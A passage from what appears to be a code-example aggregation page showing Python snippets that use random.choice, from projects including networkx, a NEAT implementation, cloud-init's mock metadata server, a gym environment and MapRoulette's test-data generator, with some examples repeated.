        raise nx.NetworkXError("Graph has less than four nodes.")
    n = 0
    swapcount = 0
    deg = G.degree()
    # Label key for nodes
    dk = list(n for n, d in G.degree())
    cdf = nx.utils.cumulative_distribution(list(d for n, d in G.degree()))
    window = 1
    while n < nswap:
        wcount = 0
        swapped = []
        # If the window is small, we just check each time whether the graph is
        # connected by checking if the nodes that were just separated are still
        # connected.
        if window < _window_threshold:
            # This Boolean keeps track of whether there was a failure or not.
            fail = False
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                # If G remains connected...
                if nx.has_path(G, u, v):
                    wcount += 1
                # Otherwise, undo the changes.
                else:
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                    fail = True
            # If one of the swaps failed, reduce the window size.
            if fail:
                window = int(math.ceil(window / 2))
            else:
                window += 1
        # If the window is large, then there is a good chance that a bunch of
        # swaps will work. It's quicker to do all those swaps first and then
        # check if the graph remains connected.
        else:
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                wcount += 1
            # If the graph remains connected, increase the window size.
            if nx.is_connected(G):
                window += 1
            # Otherwise, undo the changes from the previous window and decrease
            # the window size.
            else:
                while swapped:
                    (u, v, x, y) = swapped.pop()
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                window = int(math.ceil(window / 2))
    return swapcount

Example 27

Project: peas
Source File: neat.py
View license
    def mutate(self, innovations={}, global_innov=0):
        """ Perform a mutation operation on this genotype. 
            If a dict with innovations is passed in, any
            add connection operations will be added to it,
            and checked to ensure identical innovation numbers.
        """
        maxinnov = max(global_innov, max(cg[0] for cg in self.conn_genes.values()))
        
        if len(self.node_genes) < self.max_nodes and rand() < self.prob_add_node:
            possible_to_split = self.conn_genes.keys()
            # If there is a max depth, we can only split connections that skip a layer.
            # E.g. we can split a connection from layer 0 to layer 2, because the resulting
            # node would be in layer 1. We cannot split a connection from layer 1 to layer 2,
            # because that would create an intra-layer connection.
            if self.max_depth is not None:
                possible_to_split = [(fr, to) for (fr, to) in possible_to_split if
                                        self.node_genes[fr][4] + 1 < self.node_genes[to][4]]
            if possible_to_split:
                to_split = self.conn_genes[random.choice(possible_to_split)]
                to_split[4] = False # Disable the old connection
                fr, to, w = to_split[1:4]
                avg_fforder = (self.node_genes[fr][0] + self.node_genes[to][0]) * 0.5
                # We assign a random function type to the node, which is #weird
                # because I thought that in NEAT these kind of mutations
                # initially don't affect the functionality of the network.
                new_type = random.choice(self.types)
                # We assign a 'layer' to the new node that is one lower than the target of the connection
                layer = self.node_genes[fr][4] + 1
                node_gene = [avg_fforder, new_type, 0.0, self.response_default, layer]
                new_id = len(self.node_genes)
                self.node_genes.append(node_gene)

                if (fr, new_id) in innovations:
                    innov = innovations[(fr, new_id)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, new_id)] = maxinnov
                self.conn_genes[(fr, new_id)] = [innov, fr, new_id, 1.0, True]

                if (new_id, to) in innovations:
                    innov = innovations[(new_id, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(new_id, to)] = maxinnov
                self.conn_genes[(new_id, to)] = [innov, new_id, to, w, True]
            
        # This is #weird, why use "elif"? but this is what
        # neat-python does, so I'm copying.
        elif rand() < self.prob_add_conn:
            potential_conns = product(xrange(len(self.node_genes)), xrange(self.inputs, len(self.node_genes)))
            potential_conns = (c for c in potential_conns if c not in self.conn_genes)
            # Filter further connections if we're looking only for FF networks
            if self.feedforward:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][0] < self.node_genes[t][0]) # Check FFOrder
            # Don't create intra-layer connections if there is a max_depth
            if self.max_depth is not None:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][4] < self.node_genes[t][4]) # Check Layer
            potential_conns = list(potential_conns)
            # If any potential connections are left
            if potential_conns:
                (fr, to) = random.choice(potential_conns)
                # Check if this innovation was already made, otherwise assign max + 1
                if (fr, to) in innovations:
                    innov = innovations[(fr, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, to)] = maxinnov
                conn_gene = [innov, fr, to, np.random.normal(0, self.stdev_mutate_weight), True]
                self.conn_genes[(fr, to)] = conn_gene
            
        else:
            for cg in self.conn_genes.values():
                if rand() < self.prob_mutate_weight:
                    cg[3] += np.random.normal(0, self.stdev_mutate_weight)
                    cg[3] = np.clip(cg[3], self.weight_range[0], self.weight_range[1])

                if rand() < self.prob_reset_weight:
                    cg[3] = np.random.normal(0, self.stdev_mutate_weight)
                    
                if rand() < self.prob_reenable_conn:
                    cg[4] = True

                if rand() < self.prob_disable_conn:
                    cg[4] = False
                    
            # Mutate non-input nodes
            for node_gene in self.node_genes[self.inputs:]:
                if rand() < self.prob_mutate_bias:
                    node_gene[2] += np.random.normal(0, self.stdev_mutate_bias)
                    node_gene[2] = np.clip(node_gene[2], self.weight_range[0], self.weight_range[1])
                    
                if rand() < self.prob_mutate_type:
                    node_gene[1] = random.choice(self.types)
                    
                if rand() < self.prob_mutate_response:
                    node_gene[3] += np.random.normal(0, self.stdev_mutate_response)
                    
        for (fr, to) in self.conn_genes:
            if self.node_genes[to][4] == 0:
                raise Exception("Connection TO input node not allowed.")
        return self # For chaining

Example 28

Project: peas
Source File: neat.py
View license
    def mutate(self, innovations={}, global_innov=0):
        """ Perform a mutation operation on this genotype. 
            If a dict with innovations is passed in, any
            add connection operations will be added to it,
            and checked to ensure identical innovation numbers.
        """
        maxinnov = max(global_innov, max(cg[0] for cg in self.conn_genes.values()))
        
        if len(self.node_genes) < self.max_nodes and rand() < self.prob_add_node:
            possible_to_split = self.conn_genes.keys()
            # If there is a max depth, we can only split connections that skip a layer.
            # E.g. we can split a connection from layer 0 to layer 2, because the resulting
            # node would be in layer 1. We cannot split a connection from layer 1 to layer 2,
            # because that would create an intra-layer connection.
            if self.max_depth is not None:
                possible_to_split = [(fr, to) for (fr, to) in possible_to_split if
                                        self.node_genes[fr][4] + 1 < self.node_genes[to][4]]
            if possible_to_split:
                to_split = self.conn_genes[random.choice(possible_to_split)]
                to_split[4] = False # Disable the old connection
                fr, to, w = to_split[1:4]
                avg_fforder = (self.node_genes[fr][0] + self.node_genes[to][0]) * 0.5
                # We assign a random function type to the node, which is #weird
                # because I thought that in NEAT these kind of mutations
                # initially don't affect the functionality of the network.
                new_type = random.choice(self.types)
                # We assign a 'layer' to the new node that is one lower than the target of the connection
                layer = self.node_genes[fr][4] + 1
                node_gene = [avg_fforder, new_type, 0.0, self.response_default, layer]
                new_id = len(self.node_genes)
                self.node_genes.append(node_gene)

                if (fr, new_id) in innovations:
                    innov = innovations[(fr, new_id)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, new_id)] = maxinnov
                self.conn_genes[(fr, new_id)] = [innov, fr, new_id, 1.0, True]

                if (new_id, to) in innovations:
                    innov = innovations[(new_id, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(new_id, to)] = maxinnov
                self.conn_genes[(new_id, to)] = [innov, new_id, to, w, True]
            
        # This is #weird, why use "elif"? but this is what
        # neat-python does, so I'm copying.
        elif rand() < self.prob_add_conn:
            potential_conns = product(xrange(len(self.node_genes)), xrange(self.inputs, len(self.node_genes)))
            potential_conns = (c for c in potential_conns if c not in self.conn_genes)
            # Filter further connections if we're looking only for FF networks
            if self.feedforward:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][0] < self.node_genes[t][0]) # Check FFOrder
            # Don't create intra-layer connections if there is a max_depth
            if self.max_depth is not None:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][4] < self.node_genes[t][4]) # Check Layer
            potential_conns = list(potential_conns)
            # If any potential connections are left
            if potential_conns:
                (fr, to) = random.choice(potential_conns)
                # Check if this innovation was already made, otherwise assign max + 1
                if (fr, to) in innovations:
                    innov = innovations[(fr, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, to)] = maxinnov
                conn_gene = [innov, fr, to, np.random.normal(0, self.stdev_mutate_weight), True]
                self.conn_genes[(fr, to)] = conn_gene
            
        else:
            for cg in self.conn_genes.values():
                if rand() < self.prob_mutate_weight:
                    cg[3] += np.random.normal(0, self.stdev_mutate_weight)
                    cg[3] = np.clip(cg[3], self.weight_range[0], self.weight_range[1])

                if rand() < self.prob_reset_weight:
                    cg[3] = np.random.normal(0, self.stdev_mutate_weight)
                    
                if rand() < self.prob_reenable_conn:
                    cg[4] = True

                if rand() < self.prob_disable_conn:
                    cg[4] = False
                    
            # Mutate non-input nodes
            for node_gene in self.node_genes[self.inputs:]:
                if rand() < self.prob_mutate_bias:
                    node_gene[2] += np.random.normal(0, self.stdev_mutate_bias)
                    node_gene[2] = np.clip(node_gene[2], self.weight_range[0], self.weight_range[1])
                    
                if rand() < self.prob_mutate_type:
                    node_gene[1] = random.choice(self.types)
                    
                if rand() < self.prob_mutate_response:
                    node_gene[3] += np.random.normal(0, self.stdev_mutate_response)
                    
        for (fr, to) in self.conn_genes:
            if self.node_genes[to][4] == 0:
                raise Exception("Connection TO input node not allowed.")
        return self # For chaining

Example 29

Project: python-nlp
Source File: perftimings.py
View license
def main():
	key_src = range(10000)
	iter_src = array('i')

	# initialize random value/key initialization ordering
	for i in xrange(100000):
		key = random.choice(key_src)
		iter_src.append(key)

	#### Initialization
	print "Timing random initialization"

	last = time.time()
	td = dict_init(iter_src)
	print "%s: %f" % ("td", time.time()-last)
	last = time.time()
	tdd = defaultdict_init(iter_src)
	print "%s: %f" % ("tdd", time.time()-last)
	last = time.time()
	tl = list_init(iter_src)
	print "%s: %f" % ("tl", time.time()-last)
	last = time.time()
	tda = double_array_init(iter_src)
	print "%s: %f" % ("tda", time.time()-last)
	last = time.time()
	tla = long_array_init(iter_src)
	print "%s: %f" % ("tla", time.time()-last)
	last = time.time()
	cnt = counter_init(iter_src)
	print "%s: %f" % ("counter", time.time()-last)
	last = time.time()
	cCnt = cCounter_init(iter_src)
	print "%s: %f" % ("cCounter", time.time()-last)
	last = time.time()
	npa = npa_init(iter_src)
	print "%s: %f" % ("npa", time.time()-last)

	if test_iteration:

#### Random access
			print "Random Access"
			rand_access_src = array('i')
			for i in xrange(10000000):
				key = random.choice(key_src)
				rand_access_src.append(key)

				last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				rand_access(container, rand_access_src)
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Forward Iteration
			print "Iteration Access"
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				iter_access(container, 1000, 'values' in dir(container))
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride forward iteration (simulates sorted sparse index)
			print "Sparse Iteration Access"
			stride_src = sorted(rand_access_src)
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in stride_src:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride backward-forward iteration (simulates sorted sparse index)
			print "Sparse Forward/Backward Iteration Access"
			back = list(xrange(len(stride_src)))
			for i in xrange(len(stride_src)):
				back[i] = random.choice([True,False])

			access_order = list()
			current_pos = 0
			for (pos, stride) in enumerate(stride_src):
				if back[pos]: current_pos = (current_pos - stride) % len(container)
				else: current_pos = (current_pos + stride) % len(container)
				access_order.append(current_pos)

			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in access_order:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()
		
	#### Test counter-specifics
	print "arg_max"
	last = time.time()
	
	for (container, name) in zip((cnt, cCnt, npa), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()
	
	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()
		
	print "normalize"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		container.normalize()
		print "%s: %f" % (name, time.time()-last)
		last = time.time()

	last = time.time()
	npa = divide(npa, npa.sum())
	print "%s: %f" % ("npa", time.time()-last)
	last = time.time()

	print "arg_max"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()
		
	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()

Example 30

Project: python-nlp
Source File: perftimings.py
View license
def main():
	key_src = range(10000)
	iter_src = array('i')

	# initialize random value/key initialization ordering
	for i in xrange(100000):
		key = random.choice(key_src)
		iter_src.append(key)

	#### Initialization
	print "Timing random initialization"

	last = time.time()
	td = dict_init(iter_src)
	print "%s: %f" % ("td", time.time()-last)
	last = time.time()
	tdd = defaultdict_init(iter_src)
	print "%s: %f" % ("tdd", time.time()-last)
	last = time.time()
	tl = list_init(iter_src)
	print "%s: %f" % ("tl", time.time()-last)
	last = time.time()
	tda = double_array_init(iter_src)
	print "%s: %f" % ("tda", time.time()-last)
	last = time.time()
	tla = long_array_init(iter_src)
	print "%s: %f" % ("tla", time.time()-last)
	last = time.time()
	cnt = counter_init(iter_src)
	print "%s: %f" % ("counter", time.time()-last)
	last = time.time()
	cCnt = cCounter_init(iter_src)
	print "%s: %f" % ("cCounter", time.time()-last)
	last = time.time()
	npa = npa_init(iter_src)
	print "%s: %f" % ("npa", time.time()-last)

	if test_iteration:

#### Random access
			print "Random Access"
			rand_access_src = array('i')
			for i in xrange(10000000):
				key = random.choice(key_src)
				rand_access_src.append(key)

				last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				rand_access(container, rand_access_src)
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Forward Iteration
			print "Iteration Access"
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				iter_access(container, 1000, 'values' in dir(container))
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride forward iteration (simulates sorted sparse index)
			print "Sparse Iteration Access"
			stride_src = sorted(rand_access_src)
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in stride_src:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride backward-forward iteration (simulates sorted sparse index)
			print "Sparse Forward/Backward Iteration Access"
			back = list(xrange(len(stride_src)))
			for i in xrange(len(stride_src)):
				back[i] = random.choice([True,False])

			access_order = list()
			current_pos = 0
			for (pos, stride) in enumerate(stride_src):
				if back[pos]: current_pos = (current_pos - stride) % len(container)
				else: current_pos = (current_pos + stride) % len(container)
				access_order.append(current_pos)

			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in access_order:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()
		
	#### Test counter-specifics
	print "arg_max"
	last = time.time()
	
	for (container, name) in zip((cnt, cCnt, npa), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()
	
	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()
		
	print "normalize"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		container.normalize()
		print "%s: %f" % (name, time.time()-last)
		last = time.time()

	last = time.time()
	npa = divide(npa, npa.sum())
	print "%s: %f" % ("npa", time.time()-last)
	last = time.time()

	print "arg_max"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()
		
	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()

Example 31

Project: cloud-init
Source File: mock-meta.py
View license
    def get_data(self, params, who, **kwargs):
        if not params:
            # Show the root level capabilities when
            # no params are passed...
            caps = sorted(META_CAPABILITIES)
            return "\n".join(caps)
        action = params[0]
        action = action.lower()
        if action == 'instance-id':
            return 'i-%s' % (id_generator(lower=True))
        elif action == 'ami-launch-index':
            return "%s" % random.choice([0, 1, 2, 3])
        elif action == 'aki-id':
            return 'aki-%s' % (id_generator(lower=True))
        elif action == 'ami-id':
            return 'ami-%s' % (id_generator(lower=True))
        elif action == 'ari-id':
            return 'ari-%s' % (id_generator(lower=True))
        elif action == 'block-device-mapping':
            nparams = params[1:]
            if not nparams:
                return "\n".join(BLOCK_DEVS)
            else:
                subvalue = traverse(nparams, DEV_MAPPINGS)
                if not subvalue:
                    return "\n".join(sorted(list(DEV_MAPPINGS.keys())))
                else:
                    return str(subvalue)
        elif action in ['hostname', 'local-hostname', 'public-hostname']:
            # Just echo back there own hostname that they called in on..
            return "%s" % (who)
        elif action == 'instance-type':
            return random.choice(INSTANCE_TYPES)
        elif action == 'ami-manifest-path':
            return 'my-amis/spamd-image.manifest.xml'
        elif action == 'security-groups':
            return 'default'
        elif action in ['local-ipv4', 'public-ipv4']:
            # Just echo back there own ip that they called in on...
            return "%s" % (kwargs.get('client_ip', '10.0.0.1'))
        elif action == 'reservation-id':
            return "r-%s" % (id_generator(lower=True))
        elif action == 'product-codes':
            return "%s" % (id_generator(size=8))
        elif action == 'public-keys':
            nparams = params[1:]
            # This is a weird kludge, why amazon why!!!
            # public-keys is messed up, list of /latest/meta-data/public-keys/
            # shows something like: '0=brickies'
            # but a GET to /latest/meta-data/public-keys/0=brickies will fail
            # you have to know to get '/latest/meta-data/public-keys/0', then
            # from there you get a 'openssh-key', which you can get.
            # this hunk of code just re-works the object for that.
            avail_keys = get_ssh_keys()
            key_ids = sorted(list(avail_keys.keys()))
            if nparams:
                mybe_key = nparams[0]
                try:
                    key_id = int(mybe_key)
                    key_name = key_ids[key_id]
                except:
                    raise WebException(httplib.BAD_REQUEST,
                                       "Unknown key id %r" % mybe_key)
                # Extract the possible sub-params
                result = traverse(nparams[1:], {
                    "openssh-key": "\n".join(avail_keys[key_name]),
                })
                if isinstance(result, (dict)):
                    # TODO(harlowja): This might not be right??
                    result = "\n".join(sorted(result.keys()))
                if not result:
                    result = ''
                return result
            else:
                contents = []
                for (i, key_id) in enumerate(key_ids):
                    contents.append("%s=%s" % (i, key_id))
                return "\n".join(contents)
        elif action == 'placement':
            nparams = params[1:]
            if not nparams:
                pcaps = sorted(PLACEMENT_CAPABILITIES.keys())
                return "\n".join(pcaps)
            else:
                pentry = nparams[0].strip().lower()
                if pentry == 'availability-zone':
                    zones = PLACEMENT_CAPABILITIES[pentry]
                    return "%s" % random.choice(zones)
                else:
                    return "%s" % (PLACEMENT_CAPABILITIES.get(pentry, ''))
        else:
            log.warn(("Did not implement action %s, "
                      "returning empty response: %r"),
                     action, NOT_IMPL_RESPONSE)
            return NOT_IMPL_RESPONSE

Example 32

Project: cloud-init
Source File: mock-meta.py
View license
    def get_data(self, params, who, **kwargs):
        if not params:
            # Show the root level capabilities when
            # no params are passed...
            caps = sorted(META_CAPABILITIES)
            return "\n".join(caps)
        action = params[0]
        action = action.lower()
        if action == 'instance-id':
            return 'i-%s' % (id_generator(lower=True))
        elif action == 'ami-launch-index':
            return "%s" % random.choice([0, 1, 2, 3])
        elif action == 'aki-id':
            return 'aki-%s' % (id_generator(lower=True))
        elif action == 'ami-id':
            return 'ami-%s' % (id_generator(lower=True))
        elif action == 'ari-id':
            return 'ari-%s' % (id_generator(lower=True))
        elif action == 'block-device-mapping':
            nparams = params[1:]
            if not nparams:
                return "\n".join(BLOCK_DEVS)
            else:
                subvalue = traverse(nparams, DEV_MAPPINGS)
                if not subvalue:
                    return "\n".join(sorted(list(DEV_MAPPINGS.keys())))
                else:
                    return str(subvalue)
        elif action in ['hostname', 'local-hostname', 'public-hostname']:
            # Just echo back there own hostname that they called in on..
            return "%s" % (who)
        elif action == 'instance-type':
            return random.choice(INSTANCE_TYPES)
        elif action == 'ami-manifest-path':
            return 'my-amis/spamd-image.manifest.xml'
        elif action == 'security-groups':
            return 'default'
        elif action in ['local-ipv4', 'public-ipv4']:
            # Just echo back there own ip that they called in on...
            return "%s" % (kwargs.get('client_ip', '10.0.0.1'))
        elif action == 'reservation-id':
            return "r-%s" % (id_generator(lower=True))
        elif action == 'product-codes':
            return "%s" % (id_generator(size=8))
        elif action == 'public-keys':
            nparams = params[1:]
            # This is a weird kludge, why amazon why!!!
            # public-keys is messed up, list of /latest/meta-data/public-keys/
            # shows something like: '0=brickies'
            # but a GET to /latest/meta-data/public-keys/0=brickies will fail
            # you have to know to get '/latest/meta-data/public-keys/0', then
            # from there you get a 'openssh-key', which you can get.
            # this hunk of code just re-works the object for that.
            avail_keys = get_ssh_keys()
            key_ids = sorted(list(avail_keys.keys()))
            if nparams:
                mybe_key = nparams[0]
                try:
                    key_id = int(mybe_key)
                    key_name = key_ids[key_id]
                except:
                    raise WebException(httplib.BAD_REQUEST,
                                       "Unknown key id %r" % mybe_key)
                # Extract the possible sub-params
                result = traverse(nparams[1:], {
                    "openssh-key": "\n".join(avail_keys[key_name]),
                })
                if isinstance(result, (dict)):
                    # TODO(harlowja): This might not be right??
                    result = "\n".join(sorted(result.keys()))
                if not result:
                    result = ''
                return result
            else:
                contents = []
                for (i, key_id) in enumerate(key_ids):
                    contents.append("%s=%s" % (i, key_id))
                return "\n".join(contents)
        elif action == 'placement':
            nparams = params[1:]
            if not nparams:
                pcaps = sorted(PLACEMENT_CAPABILITIES.keys())
                return "\n".join(pcaps)
            else:
                pentry = nparams[0].strip().lower()
                if pentry == 'availability-zone':
                    zones = PLACEMENT_CAPABILITIES[pentry]
                    return "%s" % random.choice(zones)
                else:
                    return "%s" % (PLACEMENT_CAPABILITIES.get(pentry, ''))
        else:
            log.warn(("Did not implement action %s, "
                      "returning empty response: %r"),
                     action, NOT_IMPL_RESPONSE)
            return NOT_IMPL_RESPONSE

Example 33

Project: gym
Source File: convergence.py
View license
    def _reset(self):

        reg = WeightRegularizer()

        # a hack to make regularization variable
        reg.l1 = K.variable(0.0)
        reg.l2 = K.variable(0.0)


        data, nb_classes = self.data_mix()
        X, Y, Xv, Yv = data

        # input square image dimensions
        img_rows, img_cols = X.shape[-1], X.shape[-1]
        img_channels = X.shape[1]
        # save number of classes and instances
        self.nb_classes = nb_classes
        self.nb_inst = len(X)

        # convert class vectors to binary class matrices
        Y = np_utils.to_categorical(Y, nb_classes)
        Yv = np_utils.to_categorical(Yv, nb_classes)

        # here definition of the model happens
        model = Sequential()

        # double true for icnreased probability of conv layers
        if random.choice([True, True, False]):

            # Choose convolution #1
            self.convAsz = random.choice([32,64,128])

            model.add(Convolution2D(self.convAsz, 3, 3, border_mode='same',
                                    input_shape=(img_channels, img_rows, img_cols),
                                    W_regularizer = reg,
                                    b_regularizer = reg))
            model.add(Activation('relu'))

            model.add(Convolution2D(self.convAsz, 3, 3,
                                    W_regularizer = reg,
                                    b_regularizer = reg))
            model.add(Activation('relu'))

            model.add(MaxPooling2D(pool_size=(2, 2)))
            model.add(Dropout(0.25))

            # Choose convolution size B (if needed)
            self.convBsz = random.choice([0,32,64])

            if self.convBsz > 0:
                model.add(Convolution2D(self.convBsz, 3, 3, border_mode='same',
                                        W_regularizer = reg,
                                        b_regularizer = reg))
                model.add(Activation('relu'))

                model.add(Convolution2D(self.convBsz, 3, 3,
                                        W_regularizer = reg,
                                        b_regularizer = reg))
                model.add(Activation('relu'))

                model.add(MaxPooling2D(pool_size=(2, 2)))
                model.add(Dropout(0.25))

            model.add(Flatten())

        else:
            model.add(Flatten(input_shape=(img_channels, img_rows, img_cols)))
            self.convAsz = 0
            self.convBsz = 0

        # choose fully connected layer size
        self.densesz = random.choice([256,512,762])

        model.add(Dense(self.densesz,
                                W_regularizer = reg,
                                b_regularizer = reg))
        model.add(Activation('relu'))
        model.add(Dropout(0.5))

        model.add(Dense(nb_classes,
                                W_regularizer = reg,
                                b_regularizer = reg))
        model.add(Activation('softmax'))

        # let's train the model using SGD + momentum (how original).
        sgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)
        model.compile(loss='categorical_crossentropy',
                      optimizer=sgd,
                      metrics=['accuracy'])

        X = X.astype('float32')
        Xv = Xv.astype('float32')
        X /= 255
        Xv /= 255

        self.data = (X,Y,Xv,Yv)
        self.model = model
        self.sgd = sgd

        # initial accuracy values
        self.best_val = 0.0
        self.previous_acc = 0.0

        self.reg = reg
        self.epoch_idx = 0

        return self._get_obs()

Example 34

Project: maproulette
Source File: manage.py
View license
@manager.command
def create_testdata(challenges=10, tasks=100, users=10):
    """Creates test data in the database"""
    import uuid
    import random
    from maproulette import db
    from maproulette.models import User, Challenge, Task, TaskGeometry, Action
    from shapely.geometry import Point, LineString, box

    # statuses to use
    statuses = ['available',
                'skipped',
                'fixed',
                'deleted',
                'alreadyfixed',
                'falsepositive']

    # challenge default strings
    challenge_help_test = "Sample challenge *help* text"
    challenge_instruction_test = "Challenge instruction text"
    task_instruction_text = "Task instruction text"

    # delete old tasks and challenges
    db.session.query(TaskGeometry).delete()
    db.session.query(Action).delete()
    db.session.query(Task).delete()
    db.session.query(Challenge).delete()
    db.session.query(User).delete()
    db.session.commit()

    # create users
    for uid in range(int(users)):
        user = User()
        user.id = uid
        user.display_name = 'Test User {uid}'.format(uid=uid)
        db.session.add(user)
    db.session.commit()

    # create ten challenges
    for i in range(1, int(challenges) + 1):
        print "Generating Test Challenge #%d" % i
        minx = -120
        maxx = -40
        miny = 20
        maxy = 50
        challengepoly = None
        slug = "test%d" % i
        title = "Test Challenge %d" % i
        challenge = Challenge(slug, title)
        challenge.difficulty = random.choice([1, 2, 3])
        challenge.active = True
        challenge.blurb = "This is test challenge number %d" % i
        challenge.description = "This describes challenge %d in detail" % i
        challenge.help = challenge_help_test
        challenge.instruction = challenge_instruction_test
        # have bounding boxes for all but the first two challenges.
        if i > 2:
            minx = random.randrange(-120, -40)
            miny = random.randrange(20, 50)
            maxx = minx + 1
            maxy = miny + 1
            challengepoly = box(minx, miny, maxx, maxy)
            print "\tChallenge has a bounding box of ", challengepoly
            challenge.polygon = challengepoly
        db.session.add(challenge)

        # add some tasks to the challenge
        print "\tGenerating %i tasks for challenge %i" % (int(tasks), i)
        # generate NUM_TASKS random tasks
        for j in range(int(tasks)):
            # generate a unique identifier
            identifier = str(uuid.uuid4())
            # create two random points not too far apart
            task_geometries = []
